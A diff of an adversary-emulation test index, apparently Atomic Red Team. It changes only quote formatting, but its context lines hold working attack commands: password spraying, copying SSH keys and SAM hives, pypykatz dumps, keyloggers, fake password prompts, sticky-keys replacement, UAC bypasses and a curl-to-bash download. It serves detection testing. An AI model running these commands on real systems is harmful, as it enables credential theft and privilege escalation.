supported_platforms: - windows input_arguments: @@ -4472,7 +4472,7 @@ credential-access: auto_generated_guid: 5a51ef57-299e-4d62-8e11-2d440df55e69 description: 'Attempt to brute force Azure AD user via AzureAD powershell module. - ' +' supported_platforms: - azure-ad input_arguments: @@ -4489,13 +4489,13 @@ credential-access: dependencies: - description: 'AzureAD module must be installed. - ' +' prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureAD -Force - ' +' executor: name: powershell elevation_required: false 
@@ -4681,13 +4681,13 @@ credential-access: dependencies: - description: 'List of domain users to password spray must exits at %temp%\users.txt - ' +' prereq_command: 'if not exist %temp%\users.txt (exit /b 1) - ' +' get_prereq_command: 'PathToAtomicsFolder\T1110.003\src\parse_net_users.bat - ' +' executor: name: command_prompt elevation_required: false @@ -4695,7 +4695,7 @@ credential-access: /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password} && @net use /delete %logonserver%\IPC$ > NUL - ' +' - name: Password Spray (DomainPasswordSpray) auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b description: | @@ -4794,13 +4794,13 @@ credential-access: dependencies: - description: 'AzureAD module must be installed. - ' +' prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureAD -Force - ' +' executor: name: powershell elevation_required: false @@ -4967,14 +4967,14 @@ credential-access: executor: command: 'dir c:\ /b /s .key | findstr /e .key - ' +' name: command_prompt elevation_required: true - name: Discover Private SSH Keys auto_generated_guid: 46959285-906d-40fa-9437-5a439accd878 description: 'Discover private SSH keys on a macOS or Linux system. - ' +' supported_platforms: - macos - linux @@ -4990,17 +4990,17 @@ credential-access: executor: command: 'find #{search_path} -name id_rsa >> #{output_file} - ' +' cleanup_command: 'rm #{output_file} - ' +' name: sh - name: Copy Private SSH Keys with CP auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3 description: 'Copy private SSH keys on a Linux system to a staging folder using the `cp` command. - ' +' supported_platforms: - linux input_arguments: 
@@ -5018,14 +5018,14 @@ credential-access: find #{search_path} -name id_rsa -exec cp --parents {} #{output_folder} \; cleanup_command: 'rm #{output_folder} - ' +' name: sh - name: Copy Private SSH Keys with rsync auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a description: 'Copy private SSH keys on a Linux or macOS system to a staging folder using the `rsync` command. - ' +' supported_platforms: - macos - linux @@ -5044,14 +5044,14 @@ credential-access: find #{search_path} -name id_rsa -exec rsync -R {} #{output_folder} \; cleanup_command: 'rm -rf #{output_folder} - ' +' name: sh - name: Copy the users GnuPG directory with rsync auto_generated_guid: 2a5a0601-f5fb-4e2e-aa09-73282ae6afca description: 'Copy the users GnuPG (.gnupg) directory on a Mac or Linux system to a staging folder using the `rsync` command. - ' +' supported_platforms: - macos - linux @@ -5070,7 +5070,7 @@ credential-access: find #{search_path} -type d -name '.gnupg' -exec rsync -Rr {} #{output_folder} \; cleanup_command: 'rm -rf #{output_folder} - ' +' name: sh T1003.007: technique: @@ -5138,7 +5138,7 @@ credential-access: dependencies: - description: 'Script to launch target process must exist - ' +' prereq_command: | test -f #{script_path} grep "#{pid_term}" #{script_path} @@ -5159,7 +5159,7 @@ credential-access: grep -i "PASS" "#{output_file}" cleanup_command: 'rm -f "#{output_file}" - ' +' - name: Dump individual process memory with Python (Local) auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 description: | @@ -5187,7 +5187,7 @@ credential-access: dependencies: - description: 'Script to launch target process must exist - ' +' prereq_command: | test -f #{script_path} grep "#{pid_term}" #{script_path} 
@@ -5196,11 +5196,11 @@ credential-access: echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} - description: 'Requires Python - ' +' prereq_command: "(which python || which python3 || which python2)\n" get_prereq_command: 'echo "Python 2.7+ or 3.4+ must be installed" - ' +' executor: name: sh elevation_required: true @@ -5212,7 +5212,7 @@ credential-access: grep -i "PASS" "#{output_file}" cleanup_command: 'rm -f "#{output_file}" - ' +' T1606.002: technique: external_references: @@ -5359,42 +5359,42 @@ credential-access: auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263 description: 'Parses registry hives to obtain stored credentials - ' +' supported_platforms: - windows dependency_executor_name: command_prompt dependencies: - description: 'Computer must have python 3 installed - ' +' prereq_command: | py -3 --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "Python 3 must be installed manually" - ' +' - description: 'Computer must have pip installed - ' +' prereq_command: | py -3 -m pip --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "PIP must be installed manually" - ' +' - description: 'pypykatz must be installed and part of PATH - ' +' prereq_command: | pypykatz -h >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'pip install pypykatz - ' +' executor: command: 'pypykatz live registry - ' +' name: command_prompt elevation_required: true - name: esentutl.exe SAM copy @@ -5420,12 +5420,12 @@ credential-access: executor: command: 'esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name} - ' +' name: command_prompt elevation_required: true cleanup_command: 'del #{copy_dest}\#{file_name} >nul 2>&1 - ' +' - name: PowerDump Registry dump of SAM for hashes and usernames auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193 description: Executes a hashdump by reading the hasshes from the registry. 
@@ -5478,7 +5478,7 @@ credential-access: auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0 description: 'Dump hives from volume shadow copies with System.IO.File - ' +' supported_platforms: - windows input_arguments: @@ -6293,7 +6293,7 @@ collection: elevation_required: false command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} - ' +' cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore' T1560.003: technique: @@ -6389,7 +6389,7 @@ collection: auto_generated_guid: 391f5298-b12d-4636-8482-35d9c17d53a8 description: 'Uses GZip from Python to compress files - ' +' supported_platforms: - linux input_arguments: @@ -6405,10 +6405,10 @@ collection: dependencies: - description: 'Requires Python - ' +' prereq_command: 'which_python=`which python`; $which_python -V - ' +' get_prereq_command: '' executor: name: bash @@ -6416,15 +6416,15 @@ collection: command: '$which_python -c "import gzip;input_file=open(''#{path_to_input_file}'', ''rb'');content=input_file.read();input_file.close();output_file=gzip.GzipFile(''#{path_to_output_file}'',''wb'',''compresslevel=6'');output_file.write(content);output_file.close();" - ' +' cleanup_command: 'rm #{path_to_output_file} - ' +' - name: Compressing data using bz2 in Python (Linux) auto_generated_guid: c75612b2-9de0-4d7c-879c-10d7b077072d description: 'Uses bz2 from Python to compress files - ' +' supported_platforms: - linux input_arguments: 
@@ -6440,25 +6440,25 @@ collection: dependencies: - description: 'Requires Python - ' +' prereq_command: 'which_python=`which python`; $which_python -V - ' +' get_prereq_command: '' executor: name: bash elevation_required: false command: '$which_python -c "import bz2;input_file=open(''#{path_to_input_file}'',''rb'');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open(''#{path_to_output_file}'',''w+'');output_file.write(bz2content);output_file.close();" - ' +' cleanup_command: 'rm #{path_to_output_file} - ' +' - name: Compressing data using zipfile in Python (Linux) auto_generated_guid: 001a042b-859f-44d9-bf81-fd1c4e2200b0 description: 'Uses zipfile from Python to compress files - ' +' supported_platforms: - linux input_arguments: @@ -6474,10 +6474,10 @@ collection: dependencies: - description: 'Requires Python - ' +' prereq_command: 'which_python=`which python`; $which_python -V - ' +' get_prereq_command: '' executor: name: bash @@ -6485,15 +6485,15 @@ collection: command: '$which_python -c "from zipfile import ZipFile; ZipFile(''#{path_to_output_file}'', mode=''w'').write(''#{path_to_input_file}'')" - ' +' cleanup_command: 'rm #{path_to_output_file} - ' +' - name: Compressing data using tarfile in Python (Linux) auto_generated_guid: e86f1b4b-fcc1-4a2a-ae10-b49da01458db description: 'Uses tarfile from Python to compress files - ' +' supported_platforms: - linux input_arguments: @@ -6509,10 +6509,10 @@ collection: dependencies: - description: 'Requires Python - ' +' prereq_command: 'which_python=`which python`; $which_python -V - ' +' get_prereq_command: '' executor: name: bash @@ -6521,7 +6521,7 @@ collection: mode='w').write('#{path_to_input_file}')\" \n" cleanup_command: 'rm #{path_to_output_file} - ' +' T1560.001: technique: created: '2020-02-20T21:01:25.428Z' 
@@ -6604,10 +6604,10 @@ collection: dependencies: - description: 'Rar tool must be installed at specified location (#{rar_exe}) - ' +' prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) - ' +' get_prereq_command: | echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} @@ -6617,10 +6617,10 @@ collection: elevation_required: false command: '"#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension} - ' +' cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1 - ' +' - name: Compress Data and lock with password for Exfiltration with winrar auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c description: | @@ -6640,10 +6640,10 @@ collection: dependencies: - description: 'Rar tool must be installed at specified location (#{rar_exe}) - ' +' prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) - ' +' get_prereq_command: | echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} @@ -6681,11 +6681,11 @@ collection: dependencies: - description: 'Winzip must be installed - ' +' prereq_command: 'cmd /c ''if not exist "#{winzip_exe}" (echo 1) else (echo 0)'' - ' +' get_prereq_command: | if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){ Write-Host Follow the installation prompts to continue @@ -6705,7 +6705,7 @@ collection: auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198 description: 'Note: Requires 7zip installation - ' +' supported_platforms: - windows input_arguments: 
@@ -6720,10 +6720,10 @@ collection: dependencies: - description: '7zip tool must be installed at specified location (#{7zip_exe}) - ' +' prereq_command: 'if not exist "#{7zip_exe}" (exit /b 1) - ' +' get_prereq_command: | echo Downloading 7-zip installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2002-x64.exe" #{7zip_installer} @@ -6742,7 +6742,7 @@ collection: description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression. - ' +' supported_platforms: - linux - macos @@ -6759,30 +6759,30 @@ collection: dependencies: - description: 'Files to zip must exist (#{input_files}) - ' +' prereq_command: 'if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo Please set input_files argument to include files that exist - ' +' executor: name: sh elevation_required: false command: 'zip #{output_file} #{input_files} - ' +' cleanup_command: 'rm -f #{output_file} - ' +' - name: Data Compressed - nix - gzip Single File auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. - ' +' supported_platforms: - linux - macos @@ -6802,16 +6802,16 @@ collection: command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}'' >> #{input_file}; gzip -k #{input_file}) - ' +' cleanup_command: 'rm -f #{input_file}.gz - ' +' - name: Data Compressed - nix - tar Folder or File auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. - ' +' supported_platforms: - linux - macos 
@@ -6827,28 +6827,28 @@ collection: dependencies: - description: 'Folder to zip must exist (#{input_file_folder}) - ' +' prereq_command: 'test -e #{input_file_folder} - ' +' get_prereq_command: 'echo Please set input_file_folder argument to a folder that exists - ' +' executor: name: sh elevation_required: false command: 'tar -cvzf #{output_file} #{input_file_folder} - ' +' cleanup_command: 'rm -f #{output_file} - ' +' - name: Data Encrypted with zip and gpg symmetric auto_generated_guid: '0286eb44-e7ce-41a0-b109-3da516e05a5f' description: 'Encrypt data for exiltration - ' +' supported_platforms: - macos - linux @@ -6871,10 +6871,10 @@ collection: prereq_command: 'if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi; - ' +' get_prereq_command: 'echo "Install gpg and zip to run the test"; exit 1; - ' +' executor: name: sh elevation_required: false @@ -6886,7 +6886,7 @@ collection: ls -l #{test_folder} cleanup_command: 'rm -Rf #{test_folder} - ' +' T1123: technique: id: attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967 @@ -6936,7 +6936,7 @@ collection: executor: command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet - ' +' name: powershell T1119: technique: @@ -7006,7 +7006,7 @@ collection: for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection cleanup_command: 'del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1 - ' +' name: command_prompt - name: Automated Collection PowerShell auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313 @@ -7022,7 +7022,7 @@ collection: cleanup_command: 'Remove-Item $env:TEMP\T1119_powershell_collection -Force -ErrorAction Ignore | Out-Null - ' +' name: powershell - name: Recon information for export with PowerShell auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26 
@@ -7111,7 +7111,7 @@ collection: auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7 description: 'Add data to clipboard to copy off or execute commands from. - ' +' supported_platforms: - windows executor: @@ -7121,14 +7121,14 @@ collection: clip < %temp%\T1115.txt cleanup_command: 'del %temp%\T1115.txt >nul 2>&1 - ' +' name: command_prompt - name: Execute Commands from Clipboard using PowerShell auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416 description: 'Utilize PowerShell to echo a command to clipboard and execute it - ' +' supported_platforms: - windows executor: @@ -7151,7 +7151,7 @@ collection: description: 'This module copies the data stored in the user''s clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt - ' +' supported_platforms: - windows input_arguments: @@ -7163,7 +7163,7 @@ collection: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -7174,7 +7174,7 @@ collection: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -7184,7 +7184,7 @@ collection: cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore - ' +' name: powershell T1213.001: technique: @@ -7334,7 +7334,7 @@ collection: auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 description: 'Hooks functions in PowerShell to read TLS Communications - ' +' supported_platforms: - windows input_arguments: 
@@ -7350,10 +7350,10 @@ collection: dependencies: - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name}) - ' +' prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" @@ -7906,7 +7906,7 @@ collection: to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'' - ' +' name: bash - name: PowerShell - Prompt User for Password auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 @@ -8077,7 +8077,7 @@ collection: .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath} cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Living off the land Terminal Input Capture on Linux with pam.d @@ -8096,14 +8096,14 @@ collection: dependencies: - description: 'Checking if pam_tty_audit.so is installed - ' +' prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' - ' +' get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" - ' +' supported_platforms: - linux executor: @@ -8276,17 +8276,17 @@ collection: command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" -OutFile #{output_file} - ' +' cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore - ' +' name: powershell - name: Stage data from Discovery.sh auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066 description: 'Utilize curl to download discovery.sh and execute a basic information gathering shell script - ' +' supported_platforms: - linux - macos 
@@ -8299,7 +8299,7 @@ collection: command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > #{output_file} - ' +' name: bash - name: Zip a Folder with PowerShell for Staging in Temp auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a @@ -8321,10 +8321,10 @@ collection: command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force - ' +' cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore - ' +' name: powershell T1114.001: technique: @@ -8395,23 +8395,23 @@ collection: dependencies: - description: 'Get-Inbox.ps1 must be located at #{file_path} - ' +' prereq_command: 'if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/src/Get-Inbox.ps1" -OutFile "#{file_path}\Get-Inbox.ps1" - ' +' executor: command: 'powershell -executionpolicy bypass -command #{file_path}\Get-Inbox.ps1 -file #{output_file} - ' +' cleanup_command: 'Remove-Item #{output_file} -Force -ErrorAction Ignore - ' +' name: powershell T1185: technique: @@ -8751,7 +8751,7 @@ collection: or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware) - ' +' name: Screen Capture created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 id: attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688 @@ -8783,7 +8783,7 @@ collection: auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac description: 'Use screencapture command to collect a full desktop screenshot - ' +' supported_platforms: - macos input_arguments: 
@@ -8794,16 +8794,16 @@ collection: executor: command: 'screencapture #{output_file} - ' +' cleanup_command: 'rm #{output_file} - ' +' name: bash - name: Screencapture (silent) auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 description: 'Use screencapture command to collect a full desktop screenshot - ' +' supported_platforms: - macos input_arguments: @@ -8814,17 +8814,17 @@ collection: executor: command: 'screencapture -x #{output_file} - ' +' cleanup_command: 'rm #{output_file} - ' +' name: bash - name: X Windows Capture auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac description: 'Use xwd command to collect a full desktop screenshot and review file with xwud - ' +' supported_platforms: - linux input_arguments: @@ -8846,11 +8846,11 @@ collection: dependencies: - description: 'Package with XWD and XWUD must exist on device - ' +' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi - ' +' get_prereq_command: "sudo #{package_installer} \n" executor: command: | @@ -8858,14 +8858,14 @@ collection: xwud -in #{output_file} cleanup_command: 'rm #{output_file} - ' +' name: bash - name: Capture Linux Desktop using Import Tool auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1 description: 'Use import command from ImageMagick to collect a full desktop screenshot - ' +' supported_platforms: - linux input_arguments: 
@@ -8876,28 +8876,28 @@ collection: dependencies: - description: 'ImageMagick must be installed - ' +' prereq_command: 'if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi - ' +' get_prereq_command: 'sudo apt-get -y install graphicsmagick-imagemagick-compat - ' +' executor: command: 'import -window root #{output_file} - ' +' cleanup_command: 'rm #{output_file} - ' +' name: bash - name: Windows Screencapture auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153 description: 'Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour - ' +' supported_platforms: - windows input_arguments: @@ -8919,7 +8919,7 @@ collection: cmd /c "timeout #{recording_time} > NULL && psr.exe /stop" cleanup_command: 'rm #{output_file} -ErrorAction Ignore - ' +' T1213.002: technique: external_references: @@ -9308,7 +9308,7 @@ privilege-escalation: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" - ' +' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -9316,7 +9316,7 @@ privilege-escalation: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe - ' +' type: Path default: C:\windows\system32\cmd.exe executor: @@ -9350,7 +9350,7 @@ privilege-escalation: auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 description: 'Replace sticky keys binary (sethc.exe) with cmd.exe - ' +' supported_platforms: - windows executor: @@ -9361,7 +9361,7 @@ privilege-escalation: copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe - ' +' name: command_prompt elevation_required: true T1547.014: 
@@ -9620,11 +9620,11 @@ privilege-escalation: - description: 'Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) - ' +' prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null @@ -9633,11 +9633,11 @@ privilege-escalation: - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) - ' +' prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll @@ -9645,10 +9645,10 @@ privilege-escalation: executor: command: 'reg.exe import #{registry_file} - ' +' cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1546.011: 
@@ -9756,31 +9756,31 @@ privilege-escalation: - description: 'Shim database file must exist on disk at specified location (#{file_path}) - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll - ' +' prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll executor: command: 'sdbinst.exe #{file_path} - ' +' cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: New shim database files created in the default shim database directory @@ -9978,7 +9978,7 @@ privilege-escalation: description: 'This test submits a command to be run in the future by the `at` daemon. - ' +' supported_platforms: - linux input_arguments: 
@@ -9994,30 +9994,30 @@ privilege-escalation: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH - ' +' prereq_command: 'which at && which atd - ' +' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' - ' +' - description: 'The `atd` daemon must be running - ' +' prereq_command: 'systemctl status atd || service atd status - ' +' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' - ' +' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} - ' +' T1053.002: technique: external_references: @@ -10114,7 +10114,7 @@ privilege-escalation: elevation_required: false command: 'at 13:20 /interactive cmd - ' +' T1547.002: technique: id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec @@ -10424,7 +10424,7 @@ privilege-escalation: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 - ' +' name: command_prompt - name: Bypass UAC using Event Viewer (PowerShell) auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b @@ -10446,7 +10446,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Bypass UAC using Fodhelper auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 @@ -10468,7 +10468,7 @@ privilege-escalation: cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1 - ' +' name: command_prompt - name: Bypass UAC using Fodhelper - PowerShell auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa @@ -10491,7 +10491,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Bypass UAC using ComputerDefaults (PowerShell) auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f 
@@ -10514,7 +10514,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Bypass UAC by Mocking Trusted Directories @@ -10562,7 +10562,7 @@ privilege-escalation: cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore - ' +' name: powershell - name: Disable UAC using reg.exe auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 @@ -10575,11 +10575,11 @@ privilege-escalation: command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f - ' +' cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f - ' +' name: command_prompt elevation_required: true - name: Bypass UAC using SilentCleanup task @@ -10716,7 +10716,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -10761,7 +10761,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" 
@@ -10799,7 +10799,7 @@ privilege-escalation: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -10916,10 +10916,10 @@ privilege-escalation: executor: command: 'assoc #{extension_to_change}=#{target_extension_handler} - ' +' cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} - ' +' name: command_prompt elevation_required: true T1078.004: @@ -11120,7 +11120,7 @@ privilege-escalation: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: @@ -11131,17 +11131,17 @@ privilege-escalation: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl get cronjobs -n #{namespace} - ' +' name: bash elevation_required: false - name: CreateCronjob @@ -11153,7 +11153,7 @@ privilege-escalation: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: @@ -11164,20 +11164,20 @@ privilege-escalation: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} - ' +' cleanup_command: 'kubectl delete cronjob art -n #{namespace} - ' +' name: bash elevation_required: false T1134.002: 
